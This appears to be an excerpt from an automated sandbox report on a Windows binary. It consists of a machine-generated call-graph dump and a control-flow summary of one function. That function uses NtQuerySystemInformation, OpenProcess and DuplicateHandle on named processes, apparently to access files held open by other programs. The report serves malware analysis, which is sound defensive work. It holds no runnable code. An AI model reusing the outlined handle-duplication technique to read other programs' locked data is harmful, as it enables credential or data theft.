37920->37925 37921->37926 37971 4169a7 11 API calls 37921->37971 37975 42fe8b 22 API calls 37922->37975 37925->37922 37978 42c02e memset 37926->37978 37927 432057 37927->37926 37976 431917 23 API calls 37927->37976 37929 432079 37977 430b5d 11 API calls 37929->37977 37938 415a9d 37937->37938 37939 415ab3 37938->37939 37940 415aa4 memset 37938->37940 37939->37856 37940->37939 37941->37860 37942->37865 37943->37867 37944->37865 37946 438187 37945->37946 37948 431ab6 37945->37948 37980 4380f6 37946->37980 37948->37880 37948->37926 37949 43041c 12 API calls 37948->37949 37949->37878 37950->37879 37952 43817e 140 API calls 37951->37952 37954 42ff99 37952->37954 37953 42ff9d 37953->37880 37954->37953 37955 42ffe3 37954->37955 37956 42ffd0 37954->37956 38471 4169a7 11 API calls 37955->38471 38470 4169a7 11 API calls 37956->38470 37959->37926 37960->37926 37961->37892 37962->37898 37964 4165a0 11 API calls 37963->37964 37965 41660d 37964->37965 37965->37895 37966->37900 37967->37896 37968->37911 37969->37926 37970->37926 37971->37926 37972->37912 37973->37917 37974->37920 37975->37927 37976->37929 37978->37873 37979->37876 37982 43811f 37980->37982 37981 438164 37981->37948 37982->37981 37985 437e5e 37982->37985 38008 4300e8 memset memset memcpy 37982->38008 38009 437d3c 37985->38009 37987 437eb3 37987->37982 37988 437ea9 37988->37987 37993 437f22 37988->37993 38024 41f432 37988->38024 37991 437f06 38072 415c56 11 API calls 37991->38072 37995 437f7f 37993->37995 38073 432d4e 37993->38073 37994 437f95 38077 415c56 11 API calls 37994->38077 37995->37994 37997 43802b 37995->37997 37999 4165ff 11 API calls 37997->37999 38000 438054 37999->38000 38035 437371 38000->38035 38003 43806b 38004 438094 38003->38004 38078 42f50e 139 API calls 38003->38078 38007 437fa3 38004->38007 38079 4300e8 memset memset memcpy 38004->38079 38007->37987 38080 41f638 104 API calls 38007->38080 38008->37982 38010 437d69 38009->38010 38013 437d80 38009->38013 38093 437ccb 11 API calls 38010->38093 38012 437d76 38012->37988 38013->38012 38014 437da3 38013->38014 38016 437d90 38013->38016 38081 438460 38014->38081 38016->38012 38097 437ccb 11 API calls 38016->38097 38018 437de8 38096 424f26 123 API calls 38018->38096 38020 437dcb 38020->38018 38094 444283 13 API calls 38020->38094 38022 437dfc 38095 437ccb 11 API calls 38022->38095 38025 41f54d 38024->38025 38031 41f44f 38024->38031 38026 41f466 38025->38026 38268 41c635 memset memset 38025->38268 38026->37991 38026->37993 38031->38026 38033 41f50b 38031->38033 38239 41f1a5 38031->38239 38264 41c06f memcmp 38031->38264 38265 41f3b1 90 API calls 38031->38265 38266 41f398 86 API calls 38031->38266 38033->38025 38033->38026 38267 41c295 86 API calls 38033->38267 38036 41703f 11 API calls 38035->38036 38037 437399 38036->38037 38038 43739d 38037->38038 38040 4373ac 38037->38040 38378 4446ea 11 API calls 38038->38378 38041 416935 16 API calls 38040->38041 38042 4373ca 38041->38042 38043 438460 134 API calls 38042->38043 38052 415a91 memset 38042->38052 38055 43758f 38042->38055 38067 437584 38042->38067 38071 437d3c 135 API calls 38042->38071 38359 4251c4 38042->38359 38377 415304 ??3@YAXPAX 38042->38377 38379 425433 13 API calls 38042->38379 38380 425413 17 API calls 38042->38380 38381 42533e 16 API calls 38042->38381 38382 42538f 16 API calls 38042->38382 38383 42453e 123 API calls 38042->38383 38043->38042 38044 4375bc 38046 415c7d 16 API calls 38044->38046 38047 4375d2 38046->38047 38069 4373a7 38047->38069 38386 4442e6 38047->38386 38050 4375e2 38050->38069 38393 444283 13 API calls 38050->38393 38052->38042 38384 42453e 123 API calls 38055->38384 38058 4375f4 38061 437620 38058->38061 38062 43760b 38058->38062 38060 43759f 38063 416935 16 API calls 38060->38063 38065 416935 16 API calls 38061->38065 38394 444283 13 API calls 38062->38394 38063->38067 38065->38069 38067->38044 38385 42453e 123 API calls 38067->38385 38068 437612 memcpy 38068->38069 38069->38003 38071->38042 38072->37987 38074 432d65 38073->38074 38075 432d58 38073->38075 38074->37995 38469 432cc4 memset memset memcpy 38075->38469 38077->38007 38078->38004 38079->38007 38080->37987 38098 41703f 38081->38098 38083 43847a 38084 43848a 38083->38084 38085 43847e 38083->38085 38105 438270 38084->38105 38135 4446ea 11 API calls 38085->38135 38089 438488 38089->38020 38091 4384bb 38092 438270 134 API calls 38091->38092 38092->38089 38093->38012 38094->38022 38095->38018 38096->38012 38097->38012 38099 417044 38098->38099 38100 41705c 38098->38100 38104 417055 38099->38104 38137 416760 11 API calls 38099->38137 38101 417075 38100->38101 38138 41707a 11 API calls 38100->38138 38101->38083 38104->38083 38106 415a91 memset 38105->38106 38107 43828d 38106->38107 38108 438297 38107->38108 38109 438341 38107->38109 38111 4382d6 38107->38111 38110 415c7d 16 API calls 38108->38110 38139 44358f 38109->38139 38113 438458 38110->38113 38114 4382fb 38111->38114 38115 4382db 38111->38115 38113->38089 38136 424f26 123 API calls 38113->38136 38182 415c23 memcpy 38114->38182 38170 416935 38115->38170 38118 438305 38122 44358f 19 API calls 38118->38122 38124 438318 38118->38124 38119 4382e9 38178 415c7d 38119->38178 38121 438373 38128 438383 38121->38128 38183 4300e8 memset memset memcpy 38121->38183 38122->38124 38124->38121 38165 43819e 38124->38165 38126 4383f5 38131 438404 38126->38131 38132 43841c 38126->38132 38127 4383cd 38127->38126 38185 42453e 123 API calls 38127->38185 38128->38127 38184 415c23 memcpy 38128->38184 38134 416935 16 API calls 38131->38134 38133 416935 16 API calls 38132->38133 38133->38108 38134->38108 38135->38089 38136->38091 38137->38104 38138->38099 38140 4435be 38139->38140 38141 443676 38140->38141 38146 4436ce 38140->38146 38149 44366c 38140->38149 38163 44360c 38140->38163 38186 442ff8 38140->38186 38142 443758 38141->38142 38145 442ff8 19 API calls 38141->38145 38148 443737 38141->38148 38154 443775 38142->38154 38195 441409 memset 38142->38195 38144 442ff8 19 API calls 38144->38142 38145->38148 38151 4165ff 11 API calls 38146->38151 38148->38144 38194 4169a7 11 API calls 38149->38194 38150 4437be 38155 4437de 38150->38155 38197 416760 11 API calls 38150->38197 38151->38141 38154->38150 38196 415c56 11 API calls 38154->38196 38157 443801 38155->38157 38198 42463b memset memcpy 38155->38198 38156 443826 38200 43bd08 memset 38156->38200 38157->38156 38199 43024d memset 38157->38199 38162 443837 38162->38163 38201 43024d memset 38162->38201 38163->38124 38166 438246 38165->38166 38168 4381ba 38165->38168 38166->38121 38167 41f432 110 API calls 38167->38168 38168->38166 38168->38167 38217 41f638 104 API calls 38168->38217 38171 41693e 38170->38171 38177 41698e 38170->38177 38173 41694c 38171->38173 38218 422fd1 memset 38171->38218 38173->38177 38219 4165a0 38173->38219 38177->38119 38179 415c81 38178->38179 38181 415c9c 38178->38181 38180 416935 16 API calls 38179->38180 38179->38181 38180->38181 38181->38108 38182->38118 38183->38128 38184->38127 38185->38126 38192 442ffe 38186->38192 38187 443094 38216 4414a9 12 API calls 38187->38216 38189 443092 38189->38140 38192->38187 38192->38189 38202 4414ff 38192->38202 38214 4169a7 11 API calls 38192->38214 38215 441325 memset 38192->38215 38194->38141 38195->38142 38196->38150 38197->38155 38198->38157 38199->38156 38200->38162 38201->38162 38203 441539 38202->38203 38205 441547 38202->38205 38204 441575 38203->38204 38203->38205 38206 441582 38203->38206 38208 42fccf 18 API calls 38204->38208 38207 4418e2 38205->38207 38211 442bd4 38205->38211 38209 43275a 12 API calls 38206->38209 38210 4414a9 12 API calls 38207->38210 38212 4418ea 38207->38212 38208->38205 38209->38205 38210->38212 38211->38212 38213 441409 memset 38211->38213 38212->38192 38213->38211 38214->38192 38215->38192 38216->38189 38217->38168 38218->38173 38225 415cfe 38219->38225 38224 422b84 15 API calls 38224->38177 38230 415d23 __aullrem __aulldvrm 38225->38230 38232 41628e 38225->38232 38226 4163ca 38227 416422 10 API calls 38226->38227 38227->38232 38228 416422 10 API calls 38228->38230 38229 416172 memset 38229->38230 38230->38226 38230->38228 38230->38229 38231 415cb9 10 API calls 38230->38231 38230->38232 38231->38230 38233 416520 38232->38233 38234 416527 38233->38234 38238 416574 38233->38238 38235 415700 10 API calls 38234->38235 38236 416544 38234->38236 38234->38238 38235->38236 38237 416561 memcpy 38236->38237 38236->38238 38237->38238 38238->38177 38238->38224 38269 41bc3b 38239->38269 38242 41edad 86 API calls 38243 41f1cb 38242->38243 38244 41f1f5 memcmp 38243->38244 38245 41f20e 38243->38245 38249 41f282 38243->38249 38244->38245 38246 41f21b memcmp 38245->38246 38245->38249 38247 41f326 38246->38247 38250 41f23d 38246->38250 38248 41ee6b 86 API calls 38247->38248 38247->38249 38248->38249 38249->38031 38250->38247 38251 41f28e memcmp 38250->38251 38293 41c8df 56 API calls 38250->38293 38251->38247 38252 41f2a9 38251->38252 38252->38247 38255 41f308 38252->38255 38256 41f2d8 38252->38256 38254 41f269 38254->38247 38257 41f287 38254->38257 38258 41f27a 38254->38258 38255->38247 38298 4446ce 11 API calls 38255->38298 38259 41ee6b 86 API calls 38256->38259 38257->38251 38260 41ee6b 86 API calls 38258->38260 38261 41f2e0 38259->38261 38260->38249 38294 41b1ca 38261->38294 38264->38031 38265->38031 38266->38031 38267->38025 38268->38026 38271 41bc54 38269->38271 38277 41be0b 38269->38277 38271->38277 38281 41bc8d 38271->38281 38282 41bd61 38271->38282 38299 41baf0 55 API calls 38271->38299 38273 41be45 38273->38242 38273->38249 38275 41be04 38306 41aee4 56 API calls 38275->38306 38277->38282 38307 41ae17 34 API calls 38277->38307 38278 41bd42 38278->38275 38279 41bdd8 memset 38278->38279 38280 41bdba 38278->38280 38278->38282 38283 41bde7 memcmp 38279->38283 38292 4175ed 6 API calls 38280->38292 38281->38278 38281->38282 38284 41bd18 38281->38284 38300 4151e3 38281->38300 38282->38273 38308 41a25f memset 38282->38308 38283->38275 38286 41bdfd 38283->38286 38284->38278 38284->38282 38304 41a9da 86 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 38284->38304 38285 41bdcc 38285->38282 38285->38283 38305 41a1b0 memset 38286->38305 38292->38285 38293->38254 38295 41b1e4 38294->38295 38297 41b243 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 38295->38297 38358 41a1b0 memset 38295->38358 38297->38249 38298->38247 38299->38281 38309 41837f 38300->38309 38303 444706 11 API calls 38303->38284 38304->38278 38305->38275 38306->38277 38307->38282 38308->38273 38310 4183c1 38309->38310 38311 4183ca 38309->38311 38356 418197 25 API calls 38310->38356 38314 4151f9 38311->38314 38330 418160 38311->38330 38314->38284 38314->38303 38315 4183e5 38315->38314 38339 41739b 38315->38339 38318 418444 CreateFileW 38320 418477 38318->38320 38319 41845f CreateFileA 38319->38320 38321 4184c2 memset 38320->38321 38322 41847e GetLastError ??3@YAXPAX 38320->38322 38342 418758 38321->38342 38323 4184b5 38322->38323 38324 418497 38322->38324 38357 444706 11 API calls 38323->38357 38326 41837f 49 API calls 38324->38326 38326->38314 38331 41739b GetVersionExW 38330->38331 38332 418165 38331->38332 38334 4173e4 MultiByteToWideChar malloc MultiByteToWideChar ??3@YAXPAX 38332->38334 38335 418178 38334->38335 38336 41817f 38335->38336 38337 41748f AreFileApisANSI WideCharToMultiByte malloc WideCharToMultiByte ??3@YAXPAX 38335->38337 38336->38315 38338 418188 ??3@YAXPAX 38337->38338 38338->38315 38340 4173d6 38339->38340 38341 4173ad GetVersionExW 38339->38341 38340->38318 38340->38319 38341->38340 38343 418680 43 API calls 38342->38343 38344 418782 38343->38344 38345 418506 ??3@YAXPAX 38344->38345 38346 418160 11 API calls 38344->38346 38345->38314 38347 418799 38346->38347 38347->38345 38348 41739b GetVersionExW 38347->38348 38349 4187a7 38348->38349 38350 4187da 38349->38350 38351 4187ad GetDiskFreeSpaceW 38349->38351 38353 4187ec GetDiskFreeSpaceA 38350->38353 38355 4187e8 38350->38355 38354 418800 ??3@YAXPAX 38351->38354 38353->38354 38354->38345 38355->38353 38356->38311 38357->38314 38358->38297 38395 424f07 38359->38395 38361 4251e4 38362 4251f7 38361->38362 38363 4251e8 38361->38363 38403 4250f8 38362->38403 38402 4446ea 11 API calls 38363->38402 38365 4251f2 38365->38042 38367 425209 38370 425249 38367->38370 38373 4250f8 127 API calls 38367->38373 38374 425287 38367->38374 38411 4384e9 135 API calls 38367->38411 38412 424f74 124 API calls 38367->38412 38368 415c7d 16 API calls 38368->38365 38370->38374 38413 424ff0 13 API calls 38370->38413 38373->38367 38374->38368 38375 425266 38375->38374 38414 415be9 memcpy 38375->38414 38377->38042 38378->38069 38379->38042 38380->38042 38381->38042 38382->38042 38383->38042 38384->38060 38385->38044 38387 4442eb 38386->38387 38390 444303 38386->38390 38467 41707a 11 API calls 38387->38467 38389 4442f2 38389->38390 38468 4446ea 11 API calls 38389->38468 38390->38050 38392 444300 38392->38050 38393->38058 38394->38068 38396 424f1f 38395->38396 38397 424f0c 38395->38397 38416 424eea 11 API calls 38396->38416 38415 416760 11 API calls 38397->38415 38400 424f18 38400->38361 38401 424f24 38401->38361 38402->38365 38404 425108 38403->38404 38410 42510d 38403->38410 38449 424f74 124 API calls 38404->38449 38407 42516e 38409 415c7d 16 API calls 38407->38409 38408 425115 38408->38367 38409->38408 38410->38408 38417 42569b 38410->38417 38411->38367 38412->38367 38413->38375 38414->38374 38415->38400 38416->38401 38418 4256f1 38417->38418 38445 4259c2 38417->38445 38424 4259da 38418->38424 38428 422aeb memset memcpy memcpy 38418->38428 38429 429a4d 38418->38429 38433 4260a1 38418->38433 38443 429ac1 38418->38443 38418->38445 38448 425a38 38418->38448 38450 4227f0 memset memcpy 38418->38450 38451 422b84 15 API calls 38418->38451 38452 422b5d memset memcpy memcpy 38418->38452 38453 422640 13 API calls 38418->38453 38455 4241fc 11 API calls 38418->38455 38456 42413a 90 API calls 38418->38456 38423 4260dd 38461 424251 120 API calls 38423->38461 38460 416760 11 API calls 38424->38460 38428->38418 38430 429a66 38429->38430 38431 429a9b 38429->38431 38462 415c56 11 API calls 38430->38462 38435 429a96 38431->38435 38464 416760 11 API calls 38431->38464 38459 415c56 11 API calls 38433->38459 38465 424251 120 API calls 38435->38465 38438 429a7a 38463 416760 11 API calls 38438->38463 38444 425ad6 38443->38444 38466 415c56 11 API calls 38443->38466 38444->38407 38445->38444 38454 415c56 11 API calls 38445->38454 38448->38445 38457 422640 13 API calls 38448->38457 38458 4226e0 12 API calls 38448->38458 38449->38410 38450->38418 38451->38418 38452->38418 38453->38418 38454->38424 38455->38418 38456->38418 38457->38448 38458->38448 38459->38424 38460->38423 38461->38444 38462->38438 38463->38435 38464->38435 38465->38443 38466->38424 38467->38389 38468->38392 38469->38074 38470->37953 38471->37953 40360 4148b6 FindResourceW 40361 4148f9 40360->40361 40362 4148cf SizeofResource 40360->40362 40362->40361 40363 4148e0 LoadResource 40362->40363 40363->40361 40364 4148ee LockResource 40363->40364 40364->40361 40366 441b3f 40376 43a9f6 40366->40376 40368 441b61 40549 4386af memset 40368->40549 40370 44189a 40371 4418e2 40370->40371 40373 442bd4 40370->40373 40374 4418ea 40371->40374 40550 4414a9 12 API calls 40371->40550 40373->40374 40551 441409 memset 40373->40551 40377 43aa20 40376->40377 40378 43aadf 40376->40378 40377->40378 40379 43aa34 memset 40377->40379 40378->40368 40380 43aa56 40379->40380 40381 43aa4d 40379->40381 40552 43a6e7 40380->40552 40560 42c02e memset 40381->40560 40386 43aad3 40562 4169a7 11 API calls 40386->40562 40387 43aaae 40387->40378 40387->40386 40402 43aae5 40387->40402 40388 43ac18 40391 43ac47 40388->40391 40564 42bbd5 memcpy memcpy memcpy memset memcpy 40388->40564 40392 43aca8 40391->40392 40565 438eed 16 API calls 40391->40565 40396 43acd5 40392->40396 40567 4233ae 11 API calls 40392->40567 40395 43ac87 40566 4233c5 16 API calls 40395->40566 40568 423426 11 API calls 40396->40568 40400 43ace1 40569 439811 164 API calls 40400->40569 40401 43a9f6 162 API calls 40401->40402 40402->40378 40402->40388 40402->40401 40563 439bbb 22 API calls 40402->40563 40404 43acfd 40409 43ad2c 40404->40409 40570 438eed 16 API calls 40404->40570 40406 43ad19 40571 4233c5 16 API calls 40406->40571 40408 43ad58 40572 44081d 164 API calls 40408->40572 40409->40408 40412 43add9 40409->40412 40576 423426 11 API calls 40412->40576 40413 43ae3a memset 40414 43ae73 40413->40414 40577 42e1c0 148 API calls 40414->40577 40415 43adab 40574 438c4e 164 API calls 40415->40574 40416 43ad6c 40416->40378 40416->40415 40573 42370b memset memcpy memset 40416->40573 40420 43adcc 40575 440f84 12 API calls 40420->40575 40421 43ae96 40578 42e1c0 148 API calls 40421->40578 40424 43aea8 40425 43aec1 40424->40425 40579 42e199 148 API calls 40424->40579 40426 43af00 40425->40426 40580 42e1c0 148 API calls 40425->40580 40426->40378 40430 43af1a 40426->40430 40431 43b3d9 40426->40431 40581 438eed 16 API calls 40430->40581 40436 43b3f6 40431->40436 40437 43b4c8 40431->40437 40432 43b60f 40432->40378 40640 4393a5 17 API calls 40432->40640 40435 43af2f 40582 4233c5 16 API calls 40435->40582 40622 432878 12 API calls 40436->40622 40441 43b4f2 40437->40441 40628 42bbd5 memcpy memcpy memcpy memset memcpy 40437->40628 40439 43af51 40583 423426 11 API calls 40439->40583 40629 43a76c 21 API calls 40441->40629 40443 43af7d 40584 423426 11 API calls 40443->40584 40447 43b529 40630 44081d 164 API calls 40447->40630 40448 43b462 40624 423330 11 API calls 40448->40624 40449 43af94 40585 423330 11 API calls 40449->40585 40453 43afca 40586 423330 11 API calls 40453->40586 40454 43b47e 40458 43b497 40454->40458 40625 42374a memcpy memset memcpy memcpy memcpy 40454->40625 40455 43b544 40459 43b55c 40455->40459 40631 42c02e memset 40455->40631 40456 43b428 40456->40448 40623 432b60 16 API calls 40456->40623 40626 4233ae 11 API calls 40458->40626 40632 43a87a 164 API calls 40459->40632 40461 43afdb 40587 4233ae 11 API calls 40461->40587 40466 43b56c 40470 43b58a 40466->40470 40633 423330 11 API calls 40466->40633 40467 43b4b1 40627 423399 11 API calls 40467->40627 40469 43afee 40588 44081d 164 API calls 40469->40588 40634 440f84 12 API calls 40470->40634 40471 43b4c1 40636 42db80 164 API calls 40471->40636 40476 43b592 40635 43a82f 16 API calls 40476->40635 40479 43b5b4 40637 438c4e 164 API calls 40479->40637 40481 43b5cf 40638 42c02e memset 40481->40638 40483 43b005 40483->40378 40487 43b01f 40483->40487 40589 42d836 164 API calls 40483->40589 40484 43b1ef 40599 4233c5 16 API calls 40484->40599 40487->40484 40597 423330 11 API calls 40487->40597 40598 42d71d 164 API calls 40487->40598 40488 43b212 40600 423330 11 API calls 40488->40600 40490 43b087 40590 4233ae 11 API calls 40490->40590 40491 43add4 40491->40432 40639 438f86 16 API calls 40491->40639 40494 43b22a 40601 42ccb5 11 API calls 40494->40601 40497 43b23f 40602 4233ae 11 API calls 40497->40602 40498 43b10f 40593 423330 11 API calls 40498->40593 40500 43b257 40603 4233ae 11 API calls 40500->40603 40504 43b129 40594 4233ae 11 API calls 40504->40594 40505 43b26e 40604 4233ae 11 API calls 40505->40604 40508 43b09a 40508->40498 40591 42cc15 19 API calls 40508->40591 40592 4233ae 11 API calls 40508->40592 40509 43b282 40605 43a87a 164 API calls 40509->40605 40511 43b13c 40595 440f84 12 API calls 40511->40595 40513 43b29d 40606 423330 11 API calls 40513->40606 40516 43b15f 40596 4233ae 11 API calls 40516->40596 40517 43b2af 40518 43b2b8 40517->40518 40519 43b2ce 40517->40519 40607 4233ae 11 API calls 40518->40607 40608 440f84 12 API calls 40519->40608 40523 43b2c9 40610 4233ae 11 API calls 40523->40610 40524 43b2da 40609 42370b memset memcpy memset 40524->40609 40527 43b2f9 40611 423330 11 API calls 40527->40611 40529 43b30b 40612 423330 11 API calls 40529->40612 40531 43b325 40613 423399 11 API calls 40531->40613 40533 43b332 40614 4233ae 11 API calls 40533->40614 40535 43b354 40615 423399 11 API calls 40535->40615 40537 43b364 40616 43a82f 16 API calls 40537->40616 40539 43b370 40617 42db80 164 API calls 40539->40617 40541 43b380 40618 438c4e 164 API calls 40541->40618 40543 43b39e 40619 423399 11 API calls 40543->40619 40545 43b3ae 40620 43a76c 21 API calls 40545->40620 40547 43b3c3 40621 423399 11 API calls 40547->40621 40549->40370 40550->40374 40551->40373 40553 43a6f5 40552->40553 40556 43a765 40552->40556 40553->40556 40641 42a115 40553->40641 40556->40378 40561 4397fd memset 40556->40561 40558 43a73d 40558->40556 40559 42a115 148 API calls 40558->40559 40559->40556 40560->40380 40561->40387 40562->40378 40563->40402 40564->40391 40565->40395 40566->40392 40567->40396 40568->40400 40569->40404 40570->40406 40571->40409 40572->40416 40573->40415 40574->40420 40575->40491 40576->40413 40577->40421 40578->40424 40579->40425 40580->40425 40581->40435 40582->40439 40583->40443 40584->40449 40585->40453 40586->40461 40587->40469 40588->40483 40589->40490 40590->40508 40591->40508 40592->40508 40593->40504 40594->40511 40595->40516 40596->40487 40597->40487 40598->40487 40599->40488 40600->40494 40601->40497 40602->40500 40603->40505 40604->40509 40605->40513 40606->40517 40607->40523 40608->40524 40609->40523 40610->40527 40611->40529 40612->40531 40613->40533 40614->40535 40615->40537 40616->40539 40617->40541 40618->40543 40619->40545 40620->40547 40621->40491 40622->40456 40623->40448 40624->40454 40625->40458 40626->40467 40627->40471 40628->40441 40629->40447 40630->40455 40631->40459 40632->40466 40633->40470 40634->40476 40635->40471 40636->40479 40637->40481 40638->40491 40639->40432 40640->40378 40642 42a175 40641->40642 40644 42a122 40641->40644 40642->40556 40647 42b13b 148 API calls 40642->40647 40644->40642 40645 42a115 148 API calls 40644->40645 40648 43a174 40644->40648 40672 42a0a8 148 API calls 40644->40672 40645->40644 40647->40558 40662 43a196 40648->40662 40663 43a19e 40648->40663 40649 43a306 40649->40662 40673 4388c4 14 API calls 40649->40673 40651 42ff8c 140 API calls 40651->40663 40652 42a115 148 API calls 40652->40663 40653 415a91 memset 40653->40663 40654 43a642 40654->40662 40687 4169a7 11 API calls 40654->40687 40656 4165ff 11 API calls 40656->40663 40658 43a635 40686 42c02e memset 40658->40686 40662->40644 40663->40649 40663->40651 40663->40652 40663->40653 40663->40656 40663->40662 40681 439504 13 API calls 40663->40681 40682 4312d0 148 API calls 40663->40682 40683 42be4c memcpy memcpy memcpy memset memcpy 40663->40683 40684 43a121 11 API calls 40663->40684 40665 43a325 40665->40654 40665->40658 40665->40662 40666 4169a7 11 API calls 40665->40666 40667 42b5b5 memset memcpy 40665->40667 40668 42bf4c 14 API calls 40665->40668 40671 4165ff 11 API calls 40665->40671 40674 42b63e 40665->40674 40685 42bfcf memcpy 40665->40685 40666->40665 40667->40665 40668->40665 40671->40665 40672->40644 40673->40665 40688 42b4ec 40674->40688 40676 42b64c 40694 42b5e4 memset 40676->40694 40678 42b65e 40679 42b66d 40678->40679 40695 42b3c6 11 API calls 40678->40695 40679->40665 40681->40663 40682->40663 40683->40663 40684->40663 40685->40665 40686->40654 40687->40662 40689 42b4ff 40688->40689 40690 415a91 memset 40689->40690 40691 42b52c 40690->40691 40692 42b553 memcpy 40691->40692 40693 42b545 40691->40693 40692->40693 40693->40676 40694->40678 40695->40679 40717 41493c EnumResourceNamesW 37673 4287c1 37674 4287d2 37673->37674 37675 429ac1 37673->37675 37676 428818 37674->37676 37677 42881f 37674->37677 37698 425711 37674->37698 37687 425ad6 37675->37687 37743 415c56 11 API calls 37675->37743 37710 42013a 37676->37710 37738 420244 97 API calls 37677->37738 37682 4260dd 37737 424251 120 API calls 37682->37737 37684 4259da 37736 416760 11 API calls 37684->37736 37690 422aeb memset memcpy memcpy 37690->37698 37691 429a4d 37692 429a66 37691->37692 37696 429a9b 37691->37696 37739 415c56 11 API calls 37692->37739 37694 4260a1 37735 415c56 11 API calls 37694->37735 37697 429a96 37696->37697 37741 416760 11 API calls 37696->37741 37742 424251 120 API calls 37697->37742 37698->37675 37698->37684 37698->37690 37698->37691 37698->37694 37706 4259c2 37698->37706 37709 425a38 37698->37709 37726 4227f0 memset memcpy 37698->37726 37727 422b84 15 API calls 37698->37727 37728 422b5d memset memcpy memcpy 37698->37728 37729 422640 13 API calls 37698->37729 37731 4241fc 11 API calls 37698->37731 37732 42413a 90 API calls 37698->37732 37701 429a7a 37740 416760 11 API calls 37701->37740 37706->37687 37730 415c56 11 API calls 37706->37730 37709->37706 37733 422640 13 API calls 37709->37733 37734 4226e0 12 API calls 37709->37734 37711 42014c 37710->37711 37714 420151 37710->37714 37753 41e466 97 API calls 37711->37753 37713 420162 37713->37698 37714->37713 37715 4201b3 37714->37715 37716 420229 37714->37716 37717 4201b8 37715->37717 37718 4201dc 37715->37718 37716->37713 37719 41fd5e 86 API calls 37716->37719 37744 41fbdb 37717->37744 37718->37713 37722 4201ff 37718->37722 37750 41fc4c 37718->37750 37719->37713 37722->37713 37725 42013a 97 API calls 37722->37725 37725->37713 37726->37698 37727->37698 37728->37698 37729->37698 37730->37684 37731->37698 37732->37698 37733->37709 37734->37709 37735->37684 37736->37682 37737->37687 37738->37698 37739->37701 37740->37697 37741->37697 37742->37675 37743->37684 37745 41fbf8 37744->37745 37748 41fbf1 37744->37748 37758 41ee26 37745->37758 37749 41fc39 37748->37749 37768 4446ce 11 API calls 37748->37768 37749->37713 37754 41fd5e 37749->37754 37751 41ee6b 86 API calls 37750->37751 37752 41fc5d 37751->37752 37752->37718 37753->37714 37756 41fd65 37754->37756 37755 41fdab 37755->37713 37756->37755 37757 41fbdb 86 API calls 37756->37757 37757->37756 37759 41ee41 37758->37759 37760 41ee32 37758->37760 37769 41edad 37759->37769 37772 4446ce 11 API calls 37760->37772 37763 41ee3c 37763->37748 37766 41ee58 37766->37763 37774 41ee6b 37766->37774 37768->37749 37778 41be52 37769->37778 37772->37763 37773 41eb85 11 API calls 37773->37766 37775 41ee70 37774->37775 37776 41ee78 37774->37776 37831 41bf99 86 API calls 37775->37831 37776->37763 37779 41be6f 37778->37779 37780 41be5f 37778->37780 37786 41be8c 37779->37786 37810 418c63 memset memset 37779->37810 37809 4446ce 11 API calls 37780->37809 37783 41be69 37783->37763 37783->37773 37784 41bee7 37784->37783 37814 41a453 86 API calls 37784->37814 37786->37783 37786->37784 37787 41bf3a 37786->37787 37790 41bed1 37786->37790 37813 4446ce 11 API calls 37787->37813 37789 41bef0 37789->37784 37792 41bf01 37789->37792 37790->37789 37793 41bee2 37790->37793 37791 41bf24 memset 37791->37783 37792->37791 37794 41bf14 37792->37794 37811 418a6d memset memcpy memset 37792->37811 37799 41ac13 37793->37799 37812 41a223 memset memcpy memset 37794->37812 37798 41bf20 37798->37791 37800 41ac52 37799->37800 37801 41ac3f memset 37799->37801 37804 41ac6a 37800->37804 37815 41dc14 19 API calls 37800->37815 37802 41acd9 37801->37802 37802->37784 37806 41aca1 37804->37806 37816 41519d 37804->37816 37806->37802 37807 41acc0 memset 37806->37807 37808 41accd memcpy 37806->37808 37807->37802 37808->37802 37809->37783 37810->37786 37811->37794 37812->37798 37813->37784 37815->37804 37819 4175ed 37816->37819 37827 417570 SetFilePointer 37819->37827 37822 41760a ReadFile 37823 417637 37822->37823 37824 417627 GetLastError 37822->37824 37825 4151b3 37823->37825 37826 41763e memset 37823->37826 37824->37825 37825->37806 37826->37825 37828 4175b2 37827->37828 37829 41759c GetLastError 37827->37829 37828->37822 37828->37825 37829->37828 37830 4175a8 GetLastError 37829->37830 37830->37828 37831->37776 37832 417bc5 37834 417c61 37832->37834 37838 417bda 37832->37838 37833 417bf6 UnmapViewOfFile CloseHandle 37833->37833 37833->37838 37836 417c2c 37836->37838 37844 41851e 20 API calls 37836->37844 37838->37833 37838->37834 37838->37836 37839 4175b7 37838->37839 37840 4175d6 FindCloseChangeNotification 37839->37840 37841 4175c8 37840->37841 37842 4175df 37840->37842 37841->37842 37843 4175ce Sleep 37841->37843 37842->37838 37843->37840 37844->37836 40351 4147f3 40354 414561 40351->40354 40353 414813 40355 41456d 40354->40355 40356 41457f GetPrivateProfileIntW 40354->40356 40359 4143f1 memset _itow WritePrivateProfileStringW 40355->40359 40356->40353 40358 41457a 40358->40353 40359->40358

                      Executed Functions

                      Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 FindCloseChangeNotification GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 361 40de6e-40de71 359->361 361->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->377 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                      APIs
